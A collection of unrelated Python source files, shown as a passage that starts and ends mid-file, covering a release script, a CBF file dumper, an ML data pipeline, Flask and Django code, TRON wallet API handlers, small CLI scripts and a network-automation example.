    swagger = json.load(fp)
old_version_string = swagger["info"]["version"]
# bump patch version (assumes a MAJOR.MINOR.PATCH version string)
version_numbers = [int(s) for s in old_version_string.split(".")]
version_numbers[2] = version_numbers[2] + 1
version_string = ".".join([str(n) for n in version_numbers])
print("Bumping version to %s" % version_string)
swagger["info"]["version"] = version_string
with open(version_file, "w") as fp:
    json.dump(swagger, fp, indent=2)
# 3. commit changed version
print("Committing version update")
shell("git add %s" % version_file)
shell("git commit -m \"[autorelease] v%s\"" % version_string)
# 4. tag and push
print("Tagging %s" % version_string)
shell("git tag -a -m \"[autorelease] tagging v%s\" %s" % (version_string, version_string))
print("Pushing bumped version and tag to origin")
shell("git push origin --follow-tags")
|
from __future__ import division
from six.moves import range
# LIBTBX_SET_DISPATCHER_NAME cbf.dump
import sys
def process(file_name, out=None):
    """Print the datablock/category structure of a CBF file to *out*.

    NOTE: Python 2 syntax (`print >> out`); this module predates Python 3.
    """
    if (out is None): out = sys.stdout
    import pycbf
    print >> out, "File name:", file_name
    # `object` shadows the builtin — already flagged upstream.
    object = pycbf.cbf_handle_struct() # FIXME
    # MSG_DIGEST validates the file's MD5 digests while reading.
    object.read_file(file_name, pycbf.MSG_DIGEST)
    object.rewind_datablock()
    n_blocks = object.count_datablocks()
    print >> out, "Number of blocks:", n_blocks
    for i_block in range(n_blocks):
        object.select_datablock(i_block)
        print >> out, "  Block name:", object.datablock_name()
        object.rewind_category()
        n_categories = object.count_categories()
        print >> out, "  Number of categories:", n_categories
        for i_category in range(n_categories):
            object.select_category(i_category)
            print >> out, "    Category name:", object.category_name()
    # Trailing blank line between files.
    print >> out
def run(args):
    """Dump the structure of every CBF file named in *args*."""
    if not args:
        from libtbx.utils import Usage
        import libtbx.load_env
        raise Usage("%s your.cbf ..." % libtbx.env.dispatcher_name)
    for file_name in args:
        process(file_name)

if __name__ == "__main__":
    run(args=sys.argv[1:])
|
from ztag.annotation import *
class CiscoHTTPS(TLSTag):
    """Tags TLS hosts whose certificate issuer CN identifies Cisco gear."""
    protocol = protocols.HTTPS
    subprotocol = protocols.HTTPS.TLS
    port = None  # applies to any port

    # Fixture data used by the tag test harness.
    tests = {
        "cisco_ios_server":{
            "global_metadata":{
                "manufacturer":"Cisco",
            },
            "tags":["embedded",]
        }
    }

    def process(self, obj, meta):
        # First issuer common name; raises KeyError/IndexError when absent —
        # presumably the framework treats that as "tag does not apply".
        cn = obj["certificate"]["parsed"]["issuer"]["common_name"][0]
        if "cisco" in cn.lower():
            meta.global_metadata.manufacturer = Manufacturer.CISCO
            meta.tags.add("embedded")
        return meta
|
from typing import List
class State:
    """Simple name/value pair describing one state entry."""
    name: str
    value: str

    def __init__(self, name: str, value: str):
        self.name = name
        self.value = value
class File:
    """A file referenced by name."""
    name: str

    def __init__(self, name: str):
        self.name = name
class Path:
    """Ordered collections of State and File entries along one path."""

    # Forward references kept as strings so the class does not depend on
    # sibling declaration order at class-creation time.
    state: List["State"]
    file: List["File"]

    def __init__(self):
        self.state = []
        self.file = []

    def __len__(self):
        # BUG FIX: __len__ must return an int — the original returned a
        # (len(state), len(file)) tuple, so len(path) raised TypeError.
        # Report the total number of entries instead.
        return len(self.state) + len(self.file)

    def append_state(self, obj: "State") -> None:
        """Append one State entry."""
        self.state.append(obj)
        return

    def append_file(self, obj: "File") -> None:
        """Append one File entry."""
        self.file.append(obj)
        return
class ExternalEvent:
    """An external event with an id and the paths recorded for it.

    (Removed a dead, commented-out legacy constructor.)
    """

    name: str
    cname: str
    external_id: str
    # Forward reference kept as a string: no declaration-order dependency.
    path: List["Path"]

    def __init__(self, name: str, cname: str, eid: str):
        self.name = name
        self.cname = cname
        self.external_id = eid
        self.path = []

    def __len__(self):
        # Number of recorded paths.
        return len(self.path)

    def append_path(self, obj: "Path") -> None:
        """Append one Path entry."""
        self.path.append(obj)
        return
class AudioModification:
    """A named audio modification plus its attached external events."""

    name: str
    external_event: List[ExternalEvent]

    def __init__(self, name: str):
        self.name = name
        self.external_event = []

    def __len__(self):
        # Number of attached external events.
        return len(self.external_event)

    def append_external_event(self, obj: ExternalEvent) -> None:
        """Attach one external event."""
        self.external_event.append(obj)
        return
|
# Seat-class options as (value, label) pairs.
# NOTE(review): this is a *set* literal, so iteration order is undefined;
# if these feed Django-style `choices`, a list/tuple is probably intended.
tipos_de_classes = {
    (1, 'Econômica'),
    (2, 'Executiva'),
    (3, 'Primeira Classe')
}
from pluginnet.sun397.sun397 import sun397_data_transform_val, CrossEntropyLossOneHot
from pluginnet.sun397.metrics import create_softmax_metrics_dictionary
from pluginnet.sun397.partial_evidence import build_plugins, AlexNetPartialEvidence, SUN397PE
from pluginnet.sun397.sun397 import SUN397
import torchvision
import torch
import torchvision.models as models
import pandas as pd
def create_mode_pe(conf):
    """Build the partial-evidence (data_set, net, metrics_dict, aggregator) bundle."""
    return _create__alexnet_cross_entropy_model_pe(conf)
def create_mode_base(conf):
    """Build the baseline (data_set, net, metrics_dict, aggregator) bundle."""
    return _create__alexnet_cross_entropy_model_base(conf)
def _create__alexnet_cross_entropy_model_base(conf):
    """Assemble the baseline AlexNet pipeline from *conf*.

    Mutates conf (sets 'split_file') and returns
    (data_set, net, metrics_dict, aggregator).
    """
    def target_transform(x):
        # Keep only the trailing 397 entries (the one-hot class labels).
        return x[-397:]
    # Pick the split file matching the requested split.
    if conf['split'] == 'train':
        conf['split_file'] = conf['split_file_train']
    else:
        conf['split_file'] = conf['split_file_test']
    data_set = get_dataset_base(conf['dataset_root'], conf['split_file'], conf['split'],
                                conf['hierarchy_file'], use_fraction=conf.get('train_set_size'),
                                target_transform=target_transform, seed=conf.get('seed'))
    net = models.__dict__['alexnet'](num_classes=397)
    # NOTE(review): torch.load on an untrusted file is unsafe; assumed to be
    # a locally produced checkpoint.
    state_dict = torch.load(conf['base_model_file'])
    net.load_state_dict(state_dict)
    criterion = CrossEntropyLossOneHot()
    aggregator = PredictionAggregatorSUN397(data_set.samples)
    return data_set, net, create_softmax_metrics_dictionary(criterion), aggregator
def _create__alexnet_cross_entropy_model_pe(conf):
    """Assemble the partial-evidence AlexNet pipeline from *conf*.

    Mutates conf (sets 'split_file') and returns
    (data_set, net, metrics_dict, aggregator).
    """
    def target_transform(x): return x[-397:]
    # Pick the split file matching the requested split.
    if conf['split'] == 'train':
        conf['split_file'] = conf['split_file_train']
    else:
        conf['split_file'] = conf['split_file_test']
    data_set = get_dataset(conf['dataset_root'], conf['split_file'], conf['split'],
                           conf['hierarchy_file'], use_fraction=conf.get('train_set_size'),
                           target_transform=target_transform, seed=conf.get('seed'))
    base_net = models.__dict__['alexnet'](num_classes=397)
    # Wrap the base net with the configured partial-evidence plugins.
    plugins = build_plugins(conf['plugins'])
    net = AlexNetPartialEvidence(base_net, plugins)
    # NOTE(review): checkpoint is assumed to be locally produced (torch.load).
    state_dict = torch.load(conf['base_model_file'])
    net.load_state_dict(state_dict)
    criterion = CrossEntropyLossOneHot()
    aggregator = PredictionAggregatorSUN397(data_set.samples)
    return data_set, net, create_softmax_metrics_dictionary(criterion), aggregator
def get_dataset(dataset_root, split_file, split, hierarchy_file, data_transform=sun397_data_transform_val,
                use_fraction=0, target_transform=None, seed=0):
    """Create the partial-evidence SUN397 dataset for *split*."""
    if seed is None:
        seed = 0
    loader_f = torchvision.datasets.folder.pil_loader
    if split == 'train':
        data_set = SUN397PE(dataset_root, split_file, hierarchy_file, split='train',
                            validation_size=0, transform=data_transform,
                            target_transform=target_transform, loader=loader_f,
                            use_fraction=use_fraction, random_seed=seed)
    else:
        # NOTE(review): the non-train branch does not forward loader,
        # use_fraction or the seed — presumably intentional; confirm.
        data_set = SUN397PE(dataset_root, split_file, hierarchy_file, split=split,
                            validation_size=10, transform=data_transform,
                            target_transform=target_transform)
    return data_set
def get_dataset_base(dataset_root, split_file, split, hierarchy_file, data_transform=sun397_data_transform_val,
                     use_fraction=0, target_transform=None, seed=0):
    """Create the plain SUN397 dataset for *split*."""
    if seed is None:
        seed = 0
    loader_f = torchvision.datasets.folder.pil_loader
    if split == 'train':
        data_set = SUN397(dataset_root, split_file, hierarchy_file, split='train',
                          validation_size=0, transform=data_transform,
                          target_transform=target_transform, loader=loader_f,
                          use_fraction=use_fraction, random_seed=seed)
    else:
        # NOTE(review): the non-train branch does not forward loader,
        # use_fraction or the seed — presumably intentional; confirm.
        data_set = SUN397(dataset_root, split_file, hierarchy_file, split=split,
                          validation_size=10, transform=data_transform,
                          target_transform=target_transform)
    return data_set
class PredictionAggregatorSUN397(object):
    """Collects per-batch predictions/targets from an ignite-style engine."""

    def __init__(self, files=None):
        self.predictions = []   # per-sample prediction rows
        self.ground_truth = []  # per-sample target rows
        self.files = files      # optional sample identifiers used as index
    def __call__(self, engine):
        self.add_result_(engine)
    def add_result_(self, engine):
        # engine.state.output is assumed to be a (predictions, targets)
        # tensor pair — TODO confirm against the evaluator wiring.
        out = engine.state.output
        self.predictions.extend(out[0].detach().cpu().numpy())
        self.ground_truth.extend(out[1].detach().cpu().numpy())
    def save_results(self, file_name):
        # Write collected predictions and targets side by side to HDF5.
        predictions = pd.DataFrame(self.predictions)
        gt = pd.DataFrame(self.ground_truth)
        if self.files is not None:
            predictions = predictions.set_index(pd.Index(self.files))
            gt = gt.set_index(pd.Index(self.files))
        results = pd.concat([predictions, gt], axis=1, keys=['predictions', 'ground_truth'])
        results.to_hdf(file_name, key='results', mode='w')
|
from flask_login import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from myweight import db
class EverydayWeight(db.Model):  # table name will be "everydayweight" (auto-generated, lower-cased)
    id = db.Column(db.Integer, primary_key=True)  # primary key
    username = db.Column(db.String(20))  # user name
    date = db.Column(db.DateTime)  # measurement date
    weight = db.Column(db.Float)  # weight reading
class User(db.Model, UserMixin):
    id = db.Column(db.Integer, primary_key=True)  # primary key
    name = db.Column(db.String(20))  # display name
    username = db.Column(db.String(20))  # login name
    password_hash = db.Column(db.String(128))  # password hash (never the plain text)
    def set_password(self, password):  # set the password; takes the plain password
        self.password_hash = generate_password_hash(password)  # store the derived hash on the field
    def validate_password(self, password):  # verify a password attempt
        return check_password_hash(self.password_hash, password)  # returns a bool
import multiprocessing
import os
from scalene.scalene_profiler import Scalene
import sys
import threading
@Scalene.shim
def replacement_pjoin(scalene: Scalene) -> None:
    """Replace multiprocessing.Process.join with a Scalene-aware version.

    The replacement marks the joining thread as sleeping while it waits so
    the profiler does not attribute the wait to CPU time.
    """

    def replacement_process_join(self, timeout: float = -1) -> None:
        # Mirrors multiprocessing.Process.join(); timeout=-1 means "no timeout".
        from multiprocessing.process import _children

        self._check_closed()
        assert self._parent_pid == os.getpid(), 'can only join a child process'
        assert self._popen is not None, 'can only join a started process'
        tident = threading.get_ident()
        # Poll in short slices so Scalene can keep sampling this thread.
        if timeout < 0:
            interval = sys.getswitchinterval()
        else:
            interval = min(timeout, sys.getswitchinterval())
        start_time = scalene.get_wallclock_time()
        while True:
            scalene.set_thread_sleeping(tident)
            # BUG FIX: wait on the short polling interval, not the whole
            # timeout — the original passed `timeout` (-1 by default), which
            # busy-polled instead of sleeping. Leftover active_children()
            # debug prints removed as well.
            res = self._popen.wait(interval)
            if res is not None:
                _children.discard(self)
                return
            scalene.reset_thread_sleeping(tident)
            if timeout != -1:
                end_time = scalene.get_wallclock_time()
                if end_time - start_time >= timeout:
                    _children.discard(self)
                    return

    multiprocessing.Process.join = replacement_process_join
|
""" utility functions"""
import re
import os
from os.path import basename
import gensim
import torch
from torch import nn
# Reserved vocabulary ids for the special tokens.
PAD = 0  # padding
UNK = 1  # out-of-vocabulary
START = 2  # sequence start
END = 3  # sequence end
def count_data(path):
    """ count number of data files named exactly "<n>.json" in the given path"""
    matcher = re.compile(r'[0-9]+\.json')
    # fullmatch so stray files such as "3.json.bak" are not counted
    # (re.match only anchors at the start of the name).
    match = lambda name: bool(matcher.fullmatch(name))
    names = os.listdir(path)
    n_data = len(list(filter(match, names)))
    return n_data
def make_vocab(wc, vocab_size):
    """Build a word->id mapping from word counter *wc*.

    Ids 0-3 are reserved for the special tokens; the *vocab_size* most
    frequent words follow, starting at id 4.
    """
    # Dropped the unused (and never returned) id2word dict.
    word2id = {}
    word2id['<pad>'] = PAD
    word2id['<unk>'] = UNK
    word2id['<start>'] = START
    word2id['<end>'] = END
    for i, (w, _) in enumerate(wc.most_common(vocab_size), 4):
        word2id[w] = i
    return word2id
def make_embedding(id2word, w2v_file, emb_dim, initializer=None):
    """Build an nn.Embedding weight matrix from a trained word2vec model.

    Returns the weight tensor plus the list of ids not found in the
    word2vec vocabulary (left at their initialized values).
    """
    print("loading word vectors...")
    w2v = gensim.models.Word2Vec.load(w2v_file).wv
    vocab_size = len(id2word)
    embedding = nn.Embedding(vocab_size, emb_dim).weight
    if initializer is not None:
        initializer(embedding)
    oovs = []
    with torch.no_grad():
        for i in range(len(id2word)):
            # NOTE: id2word can be list or dict
            if i == START:
                embedding[i, :] = torch.Tensor(w2v['<s>'])
            elif i == END:
                # NOTE(review): the key is literally '<\s>' (raw string), not
                # '</s>' — presumably matching the tokens used when the
                # word2vec model was trained; confirm against that script.
                embedding[i, :] = torch.Tensor(w2v[r'<\s>'])
            elif id2word[i] in w2v:
                embedding[i, :] = torch.Tensor(w2v[id2word[i]])
            else:
                oovs.append(i)
    return embedding, oovs
|
from django.test import SimpleTestCase
from django.urls import reverse, resolve
from orders.views import home, piechart, cohort, barchart, get_shipping_data, get_top3_products
class TestUrls(SimpleTestCase):
    """Check that each named URL route resolves to the intended view."""

    # NOTE: assertEqual replaces the deprecated assertEquals alias, which
    # was removed in Python 3.12.
    def test_home_url_resolves(self):
        url = reverse('home')
        self.assertEqual(resolve(url).func, home)

    def test_piechart_url_resolves(self):
        url = reverse('piechart')
        self.assertEqual(resolve(url).func, piechart)

    def test_cohort_url_resolves(self):
        url = reverse('cohort')
        self.assertEqual(resolve(url).func, cohort)

    def test_barchart_url_resolves(self):
        url = reverse('barchart')
        self.assertEqual(resolve(url).func, barchart)

    def test_get_shipping_data_url_resolves(self):
        url = reverse('api-shipping-data')
        self.assertEqual(resolve(url).func, get_shipping_data)

    def test_get_top3_products_url_resolves(self):
        url = reverse('api-top3-products')
        self.assertEqual(resolve(url).func, get_top3_products)
#!coding:utf8
#author:yqq
#date:2020/2/20 0020 17:29
#description: TRX 接口
import logging
from base_handler import BaseHandler
from utils import decimal_default, get_linenumber
import json
import sql
from utils import is_hex_str
import decimal
from decimal import Decimal
from decimal import getcontext
# Use 30 significant digits for all Decimal math in this module.
getcontext().prec = 30
from utils import RoundDown
from tronapi import Tron
from tronapi.trx import Trx
import logging
from pprint import pprint
import hashlib
from binascii import unhexlify, hexlify
# Public TronGrid endpoint, used for full, solidity and event requests alike.
TRON_RPC_URL = 'https://api.trongrid.io'
class TRX_SendRawTransaction(BaseHandler):
    """Broadcasts a signed TRX transaction, deduplicated by order id."""

    def get_order_from_db(self, order_id):
        # Returns (found, txid, tx_json) for an already-broadcast order.
        import sql
        # NOTE(review): order_id is interpolated straight into SQL — if it can
        # come from an untrusted caller this is injectable; prefer bound
        # parameters if sql.run supports them.
        sqlRet = sql.run("select * from tb_trx_broadcast where order_id='{0}';".format(order_id))
        if len(sqlRet) == 0: return (False, "", {})
        txid = sqlRet[0]['txid']
        tx_json = json.loads( sqlRet[0]['tx_json'] )
        return (True, txid, tx_json)

    def insert_txid_into_db(self, order_id, txid, tx_json_str):
        # Records a successful broadcast so retries can be answered from DB.
        import sql
        # NOTE(review): same string-formatted SQL concern as above.
        strSql = """insert into tb_trx_broadcast(order_id, txid, tx_json) values('{}','{}', '{}');""".format(order_id, txid, tx_json_str)
        logging.info('sql: {}'.format(strSql))
        sqlRet = sql.run(strSql)

    def post(self):
        """Broadcast the signed tx unless this order id was already sent."""
        trx = Trx( Tron(full_node=TRON_RPC_URL, solidity_node=TRON_RPC_URL, event_server=TRON_RPC_URL) )
        try:
            signed_trx = self.get_argument_from_json("data")
            order_id = self.get_argument_from_json("orderId")
            is_exist, txid, tx_json = self.get_order_from_db(order_id)
            if is_exist:
                # Idempotent replay: answer with the stored broadcast result.
                self.write(json.dumps(BaseHandler.success_ret_with_data(tx_json), default=decimal_default))
                return
            signed_trx_jsonobj = json.loads(signed_trx)
            ret = trx.broadcast(signed_trx_jsonobj)
            if 'result' in ret and ret['result'] == True:
                self.write(json.dumps(BaseHandler.success_ret_with_data(ret), default=decimal_default))
                # if the broadcast succeeded, persist it to the database
                # (NOTE(review): this inner check is redundant with the branch)
                if ret['result'] == True:
                    self.insert_txid_into_db(order_id=order_id, txid=ret['transaction']['txID'], tx_json_str=json.dumps(ret))
            else:
                errmsg = json.dumps(ret)
                self.write(json.dumps(BaseHandler.error_ret_with_data(errmsg)))
        except Exception as e:
            logging.error("TRX_SendRawTransaction: {}".format(e))
            self.write(json.dumps(BaseHandler.error_ret_with_data("error: %s" % e)))
        pass

    def get(self):
        # GET mirrors POST for convenience.
        self.post()
        pass
class TRX_CreateRawTransaction(BaseHandler):
    """Builds an unsigned TRX transfer transaction for offline signing."""

    @staticmethod
    def my_encode_int64(num: int) -> str:
        """Encode a positive int64 as a protobuf varint, hex-encoded.

        Protobuf varints emit the value in little-endian 7-bit groups with
        the continuation (MSB) bit set on every byte except the last.

        BUG FIX: the original built the result via hex(int(binstr, 2)) and
        so dropped a leading zero nibble (e.g. 1 -> '1' instead of '01'),
        which can corrupt the substring replacement performed in
        modify_expiration(). Emitting whole bytes avoids that.
        """
        assert num > 0
        out = bytearray()
        while True:
            group = num & 0x7F
            num >>= 7
            if num:
                out.append(group | 0x80)  # continuation bit: more groups follow
            else:
                out.append(group)         # final group: MSB clear
                break
        return out.hex()

    def modify_expiration(self, tx : dict):
        """Extend tx['raw_data']['expiration'] by one hour, in place.

        Also patches raw_data_hex (by substring replacement) and recomputes
        txID, which is the sha256 of the serialized raw body.
        """
        old_expiration_hex = TRX_CreateRawTransaction.my_encode_int64(tx['raw_data']['expiration'])
        # Push the expiration out by one hour (values are in milliseconds).
        tx['raw_data']['expiration'] += 3600 * 1000
        new_expiration_hex = TRX_CreateRawTransaction.my_encode_int64(tx['raw_data']['expiration'])
        # NOTE(review): str.replace swaps only the FIRST occurrence; this
        # relies on the old encoding appearing exactly once in raw_data_hex.
        raw_data_hex = str(tx['raw_data_hex'])
        new_raw_data_hex = raw_data_hex.replace(old_expiration_hex, new_expiration_hex)
        # txID must match the (possibly patched) raw body.
        new_txid = hashlib.sha256(unhexlify(new_raw_data_hex)).hexdigest()
        tx['txID'] = new_txid

    def post(self):
        """Create a raw transfer tx; responds with tx JSON and the sign digest."""
        try:
            trx = Trx(Tron(full_node=TRON_RPC_URL, solidity_node=TRON_RPC_URL, event_server=TRON_RPC_URL))
            src_acct = self.get_argument("src_acct")
            dst_acct = self.get_argument("dst_acct")
            stramount = self.get_argument("amount")
            src_acct = src_acct.strip()
            dst_acct = dst_acct.strip()
            stramount = stramount.strip()
            # Base58check TRON addresses are 34 chars and start with 'T'.
            if len(src_acct) != 34 or (not str(src_acct).startswith('T') ):
                raise Exception("invalid src address")
            if len(dst_acct) != 34 or (not str(dst_acct).startswith('T') ):
                raise Exception("invalid dst address")
            # NOTE(review): float is lossy for money amounts; Decimal would be
            # safer if the tronapi builder accepts it — confirm.
            amount = float(stramount)
            tx = trx.tron.transaction_builder.send_transaction(
                to=dst_acct,
                amount= amount,
                account=src_acct
            )
            self.modify_expiration(tx)
            # Placeholder slot the offline signer fills in later.
            tx['signature'] = ['this_is_placeholder_for_signature']
            rsp_data = {
                'raw_trx_json_str' : json.dumps(tx),
                'digest' : tx['txID']
            }
            logging.info(f'{rsp_data}')
            self.write(json.dumps(BaseHandler.success_ret_with_data(rsp_data), default=decimal_default))
        except Exception as e:
            logging.error("TRX_CreateRawTransaction: {}".format(e))
            self.write(json.dumps(BaseHandler.error_ret_with_data("error: %s" % e)))

    def get(self):
        # GET mirrors POST for convenience.
        self.post()
class TRX_CrawlTxData(BaseHandler):
    """Serves deposit transactions previously recorded by the chain crawler."""

    def _GetDepositTxDataFromDB(self, startblock, endblock = (1<<64) - 1) -> list:
        """Fetch deposit rows in [startblock - 100, endblock] as plain dicts."""
        try:
            if not (isinstance(startblock, int) and isinstance(endblock, int)):
                logging.error("nBegin or nEnd is not int type.")
                return []
            txRet = []
            # Re-scan a 100-block overlap so confirmation counts get refreshed.
            startblock = startblock - 100 if startblock > 100 else 0
            strSql = """SELECT * FROM tb_trx_deposit WHERE `block_number`>={} and `block_number`<={}; """.format( startblock, endblock)
            logging.info("sql : {}".format(strSql))
            # print(strSql)
            sqlRet = sql.run(strSql)
            # print(sqlRet)
            if not isinstance(sqlRet, list):
                return []
            for item in sqlRet:
                tx = {}
                tx['symbol'] = item['symbol']
                tx["txid"] = item['txid']
                tx["from"] = item["from"]
                tx["to"] = item["to"]
                tx["blocktime"] = item['timestamp']
                tx['blockNumber'] = item['block_number']
                tx["confirmations"] = item['confirmations']
                tx["value"] = item['amount']
                txRet.append(tx)
            return txRet
        except Exception as e:
            logging.error("GetTxDataInfoDB(nBegin, nEnd): {}".format( e))
            return []

    def post(self):
        try:
            startblock = int(self.get_argument("blknumber"))  # int() guards against SQL injection
            # NOTE(review): int() above raises on non-numeric input before this
            # check runs, so this branch only fires for negative values — and
            # it wraps the error message in the *success* envelope; confirm.
            if not str(startblock).isnumeric():
                errmsg = "invalid `startblock`"
                self.write(json.dumps(BaseHandler.success_ret_with_data(errmsg), default=decimal_default))
                return
            data = self._GetDepositTxDataFromDB(startblock)
            self.write(json.dumps(BaseHandler.success_ret_with_data(data), default=decimal_default))
        except Exception as e:
            self.write(json.dumps(BaseHandler.error_ret_with_data("error: %s" % e)))
            logging.error("error:{0} in {1}".format(e, get_linenumber()))
        pass

    def get(self):
        # GET mirrors POST for convenience.
        self.post()
class TRX_GetAccountInfo(BaseHandler):
    """Returns address, TRX balance and activation state for an account."""

    def post(self):
        try:
            address = self.get_argument("address")
            # Base58check TRON addresses are 34 chars and start with 'T'.
            if len(address) != 34 or (not str(address).startswith('T') ):
                raise Exception("invalid address")
            trx = Trx(Tron(full_node=TRON_RPC_URL, solidity_node=TRON_RPC_URL, event_server=TRON_RPC_URL))
            account_info = trx.get_account(address=address)
            if 'balance' in account_info:
                # Balance is reported in SUN (1 TRX = 1e6 SUN); truncate to
                # 6 decimal places, rounding toward zero.
                decBalance = Decimal(account_info['balance']) / Decimal('1000000')
                fmtBalance = decBalance.quantize(Decimal("0.000000"), getattr(decimal, 'ROUND_DOWN'))
            else:
                fmtBalance = '0.000000'
            is_active = 'create_time' in account_info  # whether the account has been activated
            rsp_data = {
                'address' : address,
                'balance' : str(fmtBalance),
                'active' : is_active
                # other token assets (e.g. TRC20-USDT) can be fetched by asset id later
            }
            logging.info(f'{rsp_data}')
            self.write(json.dumps(BaseHandler.success_ret_with_data(rsp_data), default=decimal_default))
            pass
        except Exception as e:
            self.write(json.dumps(BaseHandler.error_ret_with_data("error: %s" % e)))
            logging.error("error:{0} in {1}".format(e, get_linenumber()))
    def get(self):
        # GET mirrors POST for convenience.
        self.post()
        pass
class TRX_GetBalance(BaseHandler):
    """Returns only the formatted TRX balance of an address."""

    def post(self):
        try:
            address = self.get_argument("address")
            # Base58check TRON addresses are 34 chars and start with 'T'.
            if len(address) != 34 or (not str(address).startswith('T') ):
                raise Exception("invalid address")
            trx = Trx(Tron(full_node=TRON_RPC_URL, solidity_node=TRON_RPC_URL, event_server=TRON_RPC_URL))
            account_info = trx.get_account(address=address)
            if 'balance' in account_info:
                # Balance is in SUN (1 TRX = 1e6 SUN); truncate to 6 decimals.
                decBalance = Decimal(account_info['balance']) / Decimal('1000000')
                fmtBalance = str( decBalance.quantize(Decimal("0.000000"), getattr(decimal, 'ROUND_DOWN')) )
            else:
                fmtBalance = '0.000000'
            self.write(json.dumps(BaseHandler.success_ret_with_data(fmtBalance), default=decimal_default))
            pass
        except Exception as e:
            self.write(json.dumps(BaseHandler.error_ret_with_data("error: %s" % e)))
            logging.error("error:{0} in {1}".format(e, get_linenumber()))
    def get(self):
        # GET mirrors POST for convenience.
        self.post()
        pass
class TRX_CollectionQuery(BaseHandler):
    """Lists active addresses whose balance is worth sweeping (>= 1 TRX)."""

    def process(self, symbol : str = 'TRX') -> list:
        # Query only a slice of addresses per call to avoid HTTP timeouts.
        # NOTE(review): symbol is f-string-interpolated into SQL; it is
        # currently always the internal constant 'TRX', but keep it that way.
        strSql = f"""SELECT address FROM tb_trx_active_addrs WHERE `symbol`='{symbol}' AND `balance` >= 1 ORDER BY `balance` DESC LIMIT 25;"""
        sqlRet = sql.run(strSql)
        addrs = []
        for item in sqlRet:
            if "address" in item:
                if item['address'] not in addrs: addrs.append(item["address"])
        trx = Trx(Tron(full_node=TRON_RPC_URL, solidity_node=TRON_RPC_URL, event_server=TRON_RPC_URL))
        retList = []
        for addr in addrs:
            # Re-check the live balance on-chain; DB values may be stale.
            account_info = trx.get_account(address=addr)
            if 'balance' in account_info:
                decBalance = Decimal(account_info['balance']) / Decimal('1000000')
                fmtBalance = decBalance.quantize(Decimal("0.000000"), getattr(decimal, 'ROUND_DOWN'))
            else:
                fmtBalance = '0.000000'
            if Decimal(fmtBalance) < Decimal( '1.0' ):
                logging.info(f"{addr}'s balance({fmtBalance}) is less than 1.0TRX, skip it.")
                continue
            retList.append({'address': addr, 'balance': str(fmtBalance) , 'symbol' : symbol})
        return retList

    def post(self):
        try:
            # symbol = self.get_argument('symbol')
            # if str(symbol) not in ['TRX', 'TRC20-USDT']:
            #     raise Exception("invalid symbol")
            retdata = self.process(symbol='TRX')
            self.write(json.dumps(BaseHandler.success_ret_with_data(retdata), default=decimal_default))
            pass
        except Exception as e:
            self.write(json.dumps(BaseHandler.error_ret_with_data("error: %s" % e)))
            logging.error(" TRX_CollectionQuery error:{0} in {1}".format(e, get_linenumber()))
    def get(self):
        # GET mirrors POST for convenience.
        self.post()
|
#!/usr/bin/env python3
"""
Author : Dawei Zhang <davyzhang325@gmail.com>
Date : 2021-06-22
Purpose: Rock the Casbah
"""
import argparse
# --------------------------------------------------
def get_args():
    """Parse and return the command-line arguments."""

    arg_parser = argparse.ArgumentParser(
        description='Jump the Five',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)

    arg_parser.add_argument('text', metavar='str', help='Input text')

    return arg_parser.parse_args()
# --------------------------------------------------
def main():
    """Substitute each digit via the "jump the five" keypad mapping."""

    args = get_args()
    jumper = {'1': '9', '2': '8', '3': '7', '4': '6', '5': '0',
              '6': '4', '7': '3', '8': '2', '9': '1', '0': '5'}
    # Non-digit characters pass through untouched.
    print(''.join(jumper.get(char, char) for char in args.text))


# --------------------------------------------------
if __name__ == '__main__':
    main()
|
# Import sys
import sys
# Import pathlib and csv
import pathlib
import csv
# Path to the budget data CSV in the Resources folder.
csvpath = pathlib.Path("./Resources/budget_data.csv")

with open(csvpath) as csvfile:
    csvreader = csv.reader(csvfile, delimiter=",")
    # Skip the header row.
    csv_header = next(csvreader)

    date_set = set()         # unique month labels seen so far
    row_counter = 0          # number of unique months
    total_profit_loss = 0    # running total of the amount column
    last_month_amount = 0
    amount_change_sum = 0    # sum of month-over-month changes
    amount_change = 0
    max_increase = 0
    max_decrease = 0
    # BUG FIX: default the dates so the report cannot raise NameError on a
    # dataset that never has an increase (or decrease).
    max_increase_date = "N/A"
    max_decrease_date = "N/A"

    for row in csvreader:
        # Count each month only once.
        if row[0] not in date_set:
            date_set.add(row[0])
            row_counter = row_counter + 1
        # Accumulate total profit/loss over the whole period.
        total_profit_loss = total_profit_loss + int(row[1])
        # Month-over-month change tracking (skipped for the first row).
        if row_counter > 1:
            amount_change = int(row[1]) - last_month_amount
            amount_change_sum = amount_change_sum + amount_change
            if amount_change > max_increase:
                max_increase = amount_change
                max_increase_date = str(row[0])
            if amount_change < max_decrease:
                max_decrease = amount_change
                max_decrease_date = str(row[0])
        # Becomes "last month" for the next iteration.
        last_month_amount = int(row[1])

# Analysis output. Writing via print(file=...) instead of reassigning
# sys.stdout keeps the real stdout intact and guarantees the file closes.
with open("./analysis/analysis.txt", "w") as report:
    print("PyBank Financial Analysis", file=report)
    print("-------------------------", file=report)
    print(f"Total Months: {row_counter}", file=report)
    print(f"Total Profits/Losses: ${total_profit_loss}", file=report)
    print(f"Average Change: ${round(amount_change_sum / (row_counter - 1), 2)}", file=report)
    print(f"Greatest Increase in Profits: {max_increase_date} (${round(max_increase)})", file=report)
    print(f"Greatest Decrease in Losses: {max_decrease_date} (${round(max_decrease)})", file=report)
import fitsio
from FitsIngest import FitsIngest
class Extinction(FitsIngest):
    """FITS ingest for extinction_ebv and extinction_band data products."""

    def __init__(self, datafile, idDict, filetype, dbh):
        """ Class to ingest extinction_ebv and extinction_band data
        """
        FitsIngest.__init__(self, filetype, datafile, idDict, dbh=dbh)
        self.constants = {
            "FILENAME": self.shortfilename,
        }
        # Band products carry a BAND keyword in their header; the plain
        # EBV product does not.
        if filetype != 'coadd_extinct_ebv':
            self.header = fitsio.read_header(datafile, self.dbDict[self.objhdu]['BAND'].hdu)
            band = self.header['BAND'].strip()
            self.constants["BAND"] = band
|
"""
In this example we write a CLI tool with brigade and click to deploy configuration.
"""
import logging
from brigade.core import Brigade
from brigade.plugins.inventory.simple import SimpleInventory
from brigade.plugins.tasks import data, networking, text
import click
def base_config(task):
    """Log every host fact, then seed the per-host configuration buffer.

    Renders templates/base/{nos}/base.j2 and appends the result to
    task.host["config"], which the later tasks keep extending.
    """
    # Dump all facts for this host, including those inherited from groups.
    logging.info({task.host.name: task.host.items()})
    # Start from an empty configuration buffer for this device.
    task.host["config"] = ""
    rendered = text.template_file(task=task,
                                  template="base.j2",
                                  path="templates/base/{nos}")
